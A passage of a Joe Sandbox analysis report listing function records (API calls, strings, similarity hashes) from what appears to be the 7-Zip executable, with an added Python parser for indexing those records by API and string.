                                • Instruction Fuzzy Hash: 0641D7232082C096CB21DE2AE58005FBFF4E397794B540217FF9617B6ACA7DC195DB15
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: act:$ cpus:$ gran:$ page:
                                • API String ID: 1294909896-454015223
                                • Opcode ID: cd77afef6a19f1e87174f2b9aa2f83a1400f9bbebe3f7a725566f3c63b0bae6c
                                • Instruction ID: 2c106869780ba3255ab42b2c8abec060d05af96ff02ec155c3b7761bb915081a
                                • Opcode Fuzzy Hash: cd77afef6a19f1e87174f2b9aa2f83a1400f9bbebe3f7a725566f3c63b0bae6c
                                • Instruction Fuzzy Hash: C44181B138460591CA24EF12EA813A97361A748BD4F449127AE0E47754DFBCD5E1C74C
                                APIs
                                • free.MSVCRT ref: 004244C5
                                • _CxxThrowException.MSVCRT ref: 004245B9
                                  • Part of subcall function 004240EC: _CxxThrowException.MSVCRT ref: 004241CC
                                • _CxxThrowException.MSVCRT ref: 004245EE
                                Strings
                                • Empty file path, xrefs: 0042459C
                                • There is no second file name for rename pair:, xrefs: 004245D1
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ExceptionThrow$free
                                • String ID: Empty file path$There is no second file name for rename pair:
                                • API String ID: 3129652135-1725603831
                                • Opcode ID: 8022aaaa88cdb27e1cfc2db7b1f6733e86bc3584a93fb28a2e88449b6e4d6991
                                • Instruction ID: 8bb9dabfca19f228a498b1920cb69fbf728bc6152c564ed26e9e7d78eda07a38
                                • Opcode Fuzzy Hash: 8022aaaa88cdb27e1cfc2db7b1f6733e86bc3584a93fb28a2e88449b6e4d6991
                                • Instruction Fuzzy Hash: 3E41E2A33056D096CA20DB16E84039A6720F396BB8F809717EFBA077D4DB7CC486C749
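                                 The function records in this section all follow one plain-text layout: an APIs list (direct calls with their "ref:" address, and nested "Part of subcall function <addr>:" lines), an optional Strings list with "xrefs:" addresses, the Memory Dump Source, and the Similarity key/value block that ends with the Instruction Fuzzy Hash. The parser below is an added example and is not Joe Sandbox code; it assumes only that layout as reproduced on this page, and SAMPLE is a constructed excerpt copied from two of the entries in this section (the "Empty file path" record above and the GetCurrentDirectoryW record further down). It turns each record into a dict and builds two lookups a triager typically wants: which functions call a given API, and which functions reference a given string.

```python
"""Parse Joe Sandbox execution-graph function records (added example, not
Joe Sandbox code). Handles the plain-text layout reproduced on this page:
'•' bullets, 'ref: <addr>' suffixes, 'Part of subcall function <addr>:'
nesting and the 'Similarity' key/value lines. SAMPLE is a constructed
excerpt copied from two records in this section."""
import re
from collections import defaultdict

SAMPLE = """\
APIs
• free.MSVCRT ref: 004244C5
• _CxxThrowException.MSVCRT ref: 004245B9
  • Part of subcall function 004240EC: _CxxThrowException.MSVCRT ref: 004241CC
• _CxxThrowException.MSVCRT ref: 004245EE
Strings
• Empty file path, xrefs: 0042459C
• There is no second file name for rename pair:, xrefs: 004245D1
Memory Dump Source
• Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
Similarity
• API ID: ExceptionThrow$free
• String ID: Empty file path$There is no second file name for rename pair:
• API String ID: 3129652135-1725603831
• Opcode ID: 8022aaaa88cdb27e1cfc2db7b1f6733e86bc3584a93fb28a2e88449b6e4d6991
• Instruction Fuzzy Hash: 3E41E2A33056D096CA20DB16E84039A6720F396BB8F809717EFBA077D4DB7CC486C749
APIs
• GetCurrentDirectoryW.KERNEL32 ref: 0041759A
• GetCurrentDirectoryW.KERNEL32 ref: 004175F4
• free.MSVCRT ref: 00417606
  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
Similarity
• API ID: CurrentDirectoryfree$memmove
• String ID:
• API String ID: 4010226229-0
• Opcode ID: 368a11c4d41f2519a69cee4a7fec56a683d7dfd260bf15628a21872b28a41d3e
• Instruction Fuzzy Hash: 0121C73221CB4483CB209F25E4847AE6371F784768F505316EA9A877A4EF7DCAC5CB15
"""

BULLET = "•"
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
SIM_KEYS = ("API ID", "String ID", "API String ID", "Opcode ID",
            "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")
# "<api>.<module>[(args)][,] ref: <hex address>"
API_RE = re.compile(r"^([\w$@]+)\.(\w+)(?:\((.*?)\))?,?\s+ref:\s*([0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function ([0-9A-Fa-f]+):\s*(.*)$")
SOURCE_RE = re.compile(r"^Source File:\s*(\S+?),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(\w+)")


def _new_record():
    return {"apis": [], "subcalls": [], "strings": [], "source": None, "sim": {}}


def _parse_call(text):
    m = API_RE.match(text)
    if not m:
        return None
    api, module, args, ref = m.groups()
    return {"api": api, "module": module, "ref": ref, "args": args.split(",") if args else []}


def parse_entries(text):
    """One dict per function record; a record ends at its Instruction Fuzzy Hash line."""
    entries, rec, section = [], _new_record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith(BULLET):
            continue                                   # blank line or layout residue
        body = line[len(BULLET):].strip()
        if section == "APIs":
            sub = SUBCALL_RE.match(body)
            call = _parse_call(sub.group(2) if sub else body)
            if call and sub:
                call["parent"] = sub.group(1)          # callee in which this call happens
                rec["subcalls"].append(call)
            elif call:
                rec["apis"].append(call)
        elif section == "Strings":
            value, sep, xref = body.rpartition(", xrefs: ")
            rec["strings"].append({"value": value if sep else body, "xref": xref if sep else None})
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(body)
            if m:
                rec["source"] = {"file": m.group(1), "offset": m.group(2), "pe": m.group(3) == "true"}
        elif section == "Similarity":
            key, _, value = body.partition(":")
            key = key.strip()
            if key in SIM_KEYS:
                rec["sim"][key] = value.strip()
            if key == "Instruction Fuzzy Hash":        # last field of every record
                entries.append(rec)
                rec, section = _new_record(), None
    if rec["apis"] or rec["strings"] or rec["sim"]:    # record cut off before its hash
        entries.append(rec)
    return entries


def index_by_api(entries):
    """Map each directly called API name to the Opcode IDs of the functions that call it."""
    idx = defaultdict(set)
    for e in entries:
        for call in e["apis"]:
            idx[call["api"]].add(e["sim"].get("Opcode ID", "?"))
    return {api: sorted(ids) for api, ids in idx.items()}


def functions_with_string(entries, needle):
    """Opcode IDs of the functions whose referenced strings contain `needle`."""
    return [e["sim"].get("Opcode ID", "?") for e in entries
            if any(needle in s["value"] for s in e["strings"])]
```

                                 Run parse_entries on the text of this section (with the interactive link labels stripped) and index_by_api gives, for example, every function that calls RegOpenKeyExW or CreateFile directly; functions_with_string finds the record that owns a string seen elsewhere in the report, which is the quickest way to get from a suspicious string back to the code address (the xref) that uses it.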
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: #
                                • API String ID: 1294909896-1885708031
                                • Opcode ID: 38055dc1e7462e097eae52bffdd7dad44dd24194a95989077b927179d5e71d61
                                • Instruction ID: b7e67addebe22660a32e4fd5d5dfa518eb47a16e2266617855db942953ff437a
                                • Opcode Fuzzy Hash: 38055dc1e7462e097eae52bffdd7dad44dd24194a95989077b927179d5e71d61
                                • Instruction Fuzzy Hash: 3D31C233244A9492CB24DA16E54015EA758F784BE5F54022BFF9F8B769CE7CCA86C708
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                • String ID:
                                • API String ID: 2296236218-0
                                • Opcode ID: 52e4726711ec5748391007b40f94998213c969474937b66d9cbfd54a84faa804
                                • Instruction ID: 0d2819eb268df73bb58e29642332ac7c9668573dd88d489050959a522980f67e
                                • Opcode Fuzzy Hash: 52e4726711ec5748391007b40f94998213c969474937b66d9cbfd54a84faa804
                                • Instruction Fuzzy Hash: 0131D073704AC586CB20CF25E48479FBBA5F788B94F558126DB8967B24DB3CC886C705
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorFileLastSecurity$free
                                • String ID:
                                • API String ID: 3917221116-0
                                • Opcode ID: 1deff44bebb09b3987138b518eac41eabb6cc904571c96ae21e56ec8c08d36d3
                                • Instruction ID: 9f8a899044b0bed81b7bc4886810f811115fc3424bdb69d08f61d4b036136319
                                • Opcode Fuzzy Hash: 1deff44bebb09b3987138b518eac41eabb6cc904571c96ae21e56ec8c08d36d3
                                • Instruction Fuzzy Hash: B9318C737057809AD7149F26E8007AEB3A1F788B98F58413AEF895B754DF38C846C705
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$wcscmp
                                • String ID:
                                • API String ID: 4021281200-0
                                • Opcode ID: 22d44a6049aa5533ca4e073c02e8b0dae08f906ceeccbcac1509b0922c34b677
                                • Instruction ID: a2aa9990210c98041322d304bb8e1587d1f053aecf9033881d73b122a4805b09
                                • Opcode Fuzzy Hash: 22d44a6049aa5533ca4e073c02e8b0dae08f906ceeccbcac1509b0922c34b677
                                • Instruction Fuzzy Hash: BF319A72316B40C6D720DF12F98431EB764F7847A4F58822AEEAA47798DF7CC8818B14
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: File$Create$CloseHandleTimefree
                                • String ID:
                                • API String ID: 234454789-0
                                • Opcode ID: c728b8dd31556345467ffe1da12aa57c87299959c4f069fc15c4c46e01533b6a
                                • Instruction ID: e5870cd7408e98decc4ad5abd75801424ce949377ba4cd423136df876c693d26
                                • Opcode Fuzzy Hash: c728b8dd31556345467ffe1da12aa57c87299959c4f069fc15c4c46e01533b6a
                                • Instruction Fuzzy Hash: B021C27220468086D6209F26FA54B9A6620F385BF8F540322EE79437D8CB3DC986C648
                                APIs
                                • GetCurrentDirectoryW.KERNEL32 ref: 0041759A
                                • GetCurrentDirectoryW.KERNEL32 ref: 004175F4
                                • free.MSVCRT ref: 00417606
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CurrentDirectoryfree$memmove
                                • String ID:
                                • API String ID: 4010226229-0
                                • Opcode ID: 368a11c4d41f2519a69cee4a7fec56a683d7dfd260bf15628a21872b28a41d3e
                                • Instruction ID: c32a21ba6c68bf104816518eac272af140c7de04c86cb77c7622e2a682153bae
                                • Opcode Fuzzy Hash: 368a11c4d41f2519a69cee4a7fec56a683d7dfd260bf15628a21872b28a41d3e
                                • Instruction Fuzzy Hash: 0121C73221CB4483CB209F25E4847AE6371F784768F505316EA9A877A4EF7DCAC5CB15
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: b8ec584b560308700cc719fe69e1a7bb64ec45b8d30b4df46fd101b6897b48f8
                                • Instruction ID: fc179349d6cdd62aab15a3ad36697c7cc6bec52121955d156e63589e488f5356
                                • Opcode Fuzzy Hash: b8ec584b560308700cc719fe69e1a7bb64ec45b8d30b4df46fd101b6897b48f8
                                • Instruction Fuzzy Hash: 88118EA232875091FA14AF2BA9403A523659B17FC4FC85026CE098A309FF7CCA46E20D
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: 78dc16436171f411aa0328f5a3ed5716f1326067f0e8e8d7e17c230dbfd3e929
                                • Instruction ID: e0e22ddf349a5e4eda7b885057c896fac6482afa26ee0c9afa2ca4302952364b
                                • Opcode Fuzzy Hash: 78dc16436171f411aa0328f5a3ed5716f1326067f0e8e8d7e17c230dbfd3e929
                                • Instruction Fuzzy Hash: F91190FA32974591EA149B2B98403F923666B16FC4FC45426DE0957309FF6CCA86D30D
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: 268113d5be270a562f7383196f03c6f9e924eee01447992a60fd605f9f4079f5
                                • Instruction ID: b2a5a81eece420eb1718053f2ed77bcbf1062565a0d996db9e87dfe949844ba3
                                • Opcode Fuzzy Hash: 268113d5be270a562f7383196f03c6f9e924eee01447992a60fd605f9f4079f5
                                • Instruction Fuzzy Hash: 4F1190F63C574591FB149B2B98413A523665B1AFC4FD44426CE094A309FF7CCA66E30E
                                APIs
                                • free.MSVCRT ref: 0042E621
                                  • Part of subcall function 0042E1DC: memset.MSVCRT ref: 0042E1FF
                                  • Part of subcall function 0042E1DC: strlen.MSVCRT ref: 0042E21E
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: freememsetstrlen
                                • String ID: ?$ MB$, # $RAM
                                • API String ID: 2062123303-3586855483
                                • Opcode ID: a31aee8ee038967564c260756f0c0934e99b2ade99b10984ad30e53087e54350
                                • Instruction ID: 97df46a5594adf1f20e994543f25879124d8ff85db357d3c5daa41eb96223db1
                                • Opcode Fuzzy Hash: a31aee8ee038967564c260756f0c0934e99b2ade99b10984ad30e53087e54350
                                • Instruction Fuzzy Hash: 94118C72308A1596DA20DF27E41435D6320A789FE9F858222DF9E47764DF2DCA47C308
                                APIs
                                  • Part of subcall function 0041C684: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,00446FAE), ref: 0041C6AF
                                  • Part of subcall function 0041C59C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0041C5EA
                                  • Part of subcall function 0041C59C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0041C638
                                • free.MSVCRT ref: 00447027
                                  • Part of subcall function 00413798: free.MSVCRT ref: 004137C4
                                  • Part of subcall function 00413798: memmove.MSVCRT ref: 004137DF
                                  • Part of subcall function 00419164: free.MSVCRT ref: 004191EC
                                • free.MSVCRT ref: 0044700F
                                • free.MSVCRT ref: 0044701A
                                Strings
                                Similarity
                                • API ID: free$QueryValue$Openmemmove
                                • String ID: 7z.dll$Software\7-zip
                                • API String ID: 2771487249-1558686312
                                • Opcode ID: b3266d8cb8d56b5d9a87b488a01587aa72cdf24287fc1b58982ca6b4790d8148
                                • Instruction ID: 51a5d9ba4bea4da1839699992c0493a55addc5430115230f8213ea67e4219813
                                • Opcode Fuzzy Hash: b3266d8cb8d56b5d9a87b488a01587aa72cdf24287fc1b58982ca6b4790d8148
                                • Instruction Fuzzy Hash: 38110D7234464450CA20EB23E9513EEA711DBD5BE8F841317AE5D877A5DF2CC6C6CB08
                                APIs
                                Similarity
                                • API ID: fputs$free
                                • String ID:
                                • API String ID: 3873070119-0
                                • Opcode ID: 25e21201a733acb9d1aa11cb72841802ea41e4279b4764451413be464fb1f992
                                • Instruction ID: e423c271f3f9c4469f23d84cec1d673150f687884f274f7a262298e9275e1852
                                • Opcode Fuzzy Hash: 25e21201a733acb9d1aa11cb72841802ea41e4279b4764451413be464fb1f992
                                • Instruction Fuzzy Hash: EA115173315A4482DB20DB26E94076E6320F7C5BA9F408226EF9D43BA4DF2CC955C304
                                APIs
                                Similarity
                                • API ID: CreateDirectoryfree$ErrorLast
                                • String ID:
                                • API String ID: 3252411863-0
                                • Opcode ID: d3a5d44a16c63213326289f5f19480a8151ed31848b30160420883b42acee868
                                • Instruction ID: 4d73ab091a93de3593b3e60d2b686decea2d7057bb8b9c76cc2de7ceab64ea0d
                                • Opcode Fuzzy Hash: d3a5d44a16c63213326289f5f19480a8151ed31848b30160420883b42acee868
                                • Instruction Fuzzy Hash: B401D83234C60582DA309B32E9843AE1335ABC57A8F4842229E6E877A5DF1CC9C6D709
                                APIs
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 57756d85c65f05cda8d1a774ccd206aecd44e4c111d0521ad48d3dc7cc5f1731
                                • Instruction ID: bd91faddf8a814b45f4a09f0c9820f6653b2ea525bbcdf869f299193584bab90
                                • Opcode Fuzzy Hash: 57756d85c65f05cda8d1a774ccd206aecd44e4c111d0521ad48d3dc7cc5f1731
                                • Instruction Fuzzy Hash: 6BF01D2228560D43CA15F736F66126E5210E786B95B4015239E2A97311DE7CC4E78208
                                APIs
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 08845d820ad8a366d5d4bd19e7b6d5ca9f480e4a13f5d0935fdc3c213a3a5d05
                                • Instruction ID: f32dbd37c854599f1f6f00c23696c7a3a241c9896cf233a1f67e06b4a8b1bc17
                                • Opcode Fuzzy Hash: 08845d820ad8a366d5d4bd19e7b6d5ca9f480e4a13f5d0935fdc3c213a3a5d05
                                • Instruction Fuzzy Hash: B9F0812374168D8ADB10AE77E9910AC13109B85BEC75C4236AF1D9F704DE68CCA28344
                                APIs
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 75a5f18dca9dfb400c00d5047afe98c59e73a89a94cd2149e7029f224defeac9
                                • Instruction ID: 05834e6b5fccc0830e3398adb1bc520ddbe138e17e40e14f76c5fcbd890b7ffb
                                • Opcode Fuzzy Hash: 75a5f18dca9dfb400c00d5047afe98c59e73a89a94cd2149e7029f224defeac9
                                • Instruction Fuzzy Hash: 0DF0A4A3B41A888ADB10BE77E98119C13109F55BEDB4C4236AF2D5B744DE6CCCE28344
                                APIs
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 6ba20e383c5cd0500879b364b40f6d610812b00baf9de314c07cc055ac161e38
                                • Instruction ID: 484e05e859f0807ca02f8f68328cee660cf6c14cc770368382424b3f7a7b1439
                                • Opcode Fuzzy Hash: 6ba20e383c5cd0500879b364b40f6d610812b00baf9de314c07cc055ac161e38
                                • Instruction Fuzzy Hash: E8E0FD7265050D82CB14FB77E99106C1324E7D5F4C75411179E2DDF215CD5CCCE28384
                                APIs
                                • fputs.MSVCRT ref: 0046C0F9
                                • fputs.MSVCRT ref: 0046C137
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Similarity
                                • API ID: fputs$memset
                                • String ID: : Removing files after including to archive$Removing
                                • API String ID: 3543874852-1218467041
                                • Opcode ID: 365388ec8888a5bce23a62c4f5d5e77054b05830bb32acd764291167100e0300
                                • Instruction ID: 53ef0378ef48463589e5662a453143be2616249fa93fcc7a82b33ac10ed5e9dc
                                • Opcode Fuzzy Hash: 365388ec8888a5bce23a62c4f5d5e77054b05830bb32acd764291167100e0300
                                • Instruction Fuzzy Hash: B9319472200AC192DF68EB36E4843EE6360E751748F4885279BDF46262EF7CD5CAC309
                                APIs
                                • FormatMessageW.KERNEL32 ref: 00416DAB
                                • LocalFree.KERNEL32 ref: 00416DCD
                                  • Part of subcall function 004138A8: free.MSVCRT ref: 004138E0
                                Strings
                                • Error #, xrefs: 00416E49
                                • Internal Error: The failure in hardware (RAM or CPU), OS or program, xrefs: 00416D6F
                                Similarity
                                • API ID: FormatFreeLocalMessagefree
                                • String ID: Error #$Internal Error: The failure in hardware (RAM or CPU), OS or program
                                • API String ID: 1548054572-2710258398
                                • Opcode ID: 20b43a755eaab6f0b60d24cb7f7119fbc301bdbbf503d56a6452c0fe947358cf
                                • Instruction ID: d19e30ce4cea1da1fdc86295ab4a1b0791ee6e0d548fb38156c3774fab0a5f1d
                                • Opcode Fuzzy Hash: 20b43a755eaab6f0b60d24cb7f7119fbc301bdbbf503d56a6452c0fe947358cf
                                • Instruction Fuzzy Hash: E131DF7631478086CB20DF1AE44079E77A5F7C5BA4F858227EA8987794DB7CC1C8CB18
                                APIs
                                • fputs.MSVCRT ref: 0046C84D
                                • fputs.MSVCRT ref: 0046C85D
                                • free.MSVCRT ref: 0046C8A3
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Similarity
                                • API ID: fputs$freememset
                                • String ID: :
                                • API String ID: 2276422817-3653984579
                                • Opcode ID: ce0f28461d904f08132136cc83bb4c139334b143193e053e8f0566a4fc46ea30
                                • Instruction ID: 38657b230df64cf3f981a887839f72f225543e0ee1670fbc78a75858b555421a
                                • Opcode Fuzzy Hash: ce0f28461d904f08132136cc83bb4c139334b143193e053e8f0566a4fc46ea30
                                • Instruction Fuzzy Hash: 8611E72230064592DB28EB26D9503BD5310FBC4BA8F484637DE5E83796EF7CC4A58308
                                APIs
                                • fputs.MSVCRT ref: 0046BBB7
                                • free.MSVCRT ref: 0046BBD6
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Similarity
                                • API ID: fputs$freememset
                                • String ID: ERROR: $WARNING:
                                • API String ID: 2276422817-2114518728
                                • Opcode ID: d0996b5e8e12d31675c94c5f881c50677770b38ee2a16e5292798ad8c1da3d44
                                • Instruction ID: ec8759f765b9849bcce073acd0382558a5a12104e64027b77bdf76199e1e486c
                                • Opcode Fuzzy Hash: d0996b5e8e12d31675c94c5f881c50677770b38ee2a16e5292798ad8c1da3d44
                                • Instruction Fuzzy Hash: E211B962301A4041DB24EB27EA517EE1310E785BE8F48422B9F6F97395EF6CC8D5C308
                                APIs
                                • EnterCriticalSection.KERNEL32 ref: 004608ED
                                • fputs.MSVCRT ref: 00460955
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                • LeaveCriticalSection.KERNEL32 ref: 00460993
                                Strings
                                Similarity
                                • API ID: CriticalSectionfputs$EnterLeavememset
                                • String ID: ERROR:
                                • API String ID: 2331179553-977468659
                                • Opcode ID: e888156a1853ba4761498555462a4bc233c2ca63b88db46f8e9df512e0cf9918
                                • Instruction ID: 7ce8546304f5b4e41256a5054b02d6edd7f833a29e2f296b121f26ee665e555e
                                • Opcode Fuzzy Hash: e888156a1853ba4761498555462a4bc233c2ca63b88db46f8e9df512e0cf9918
                                • Instruction Fuzzy Hash: 93118EB631194181EB09DF26D9507EA2322EBD4FA8F084236DF1E4B765DF3888C9C318
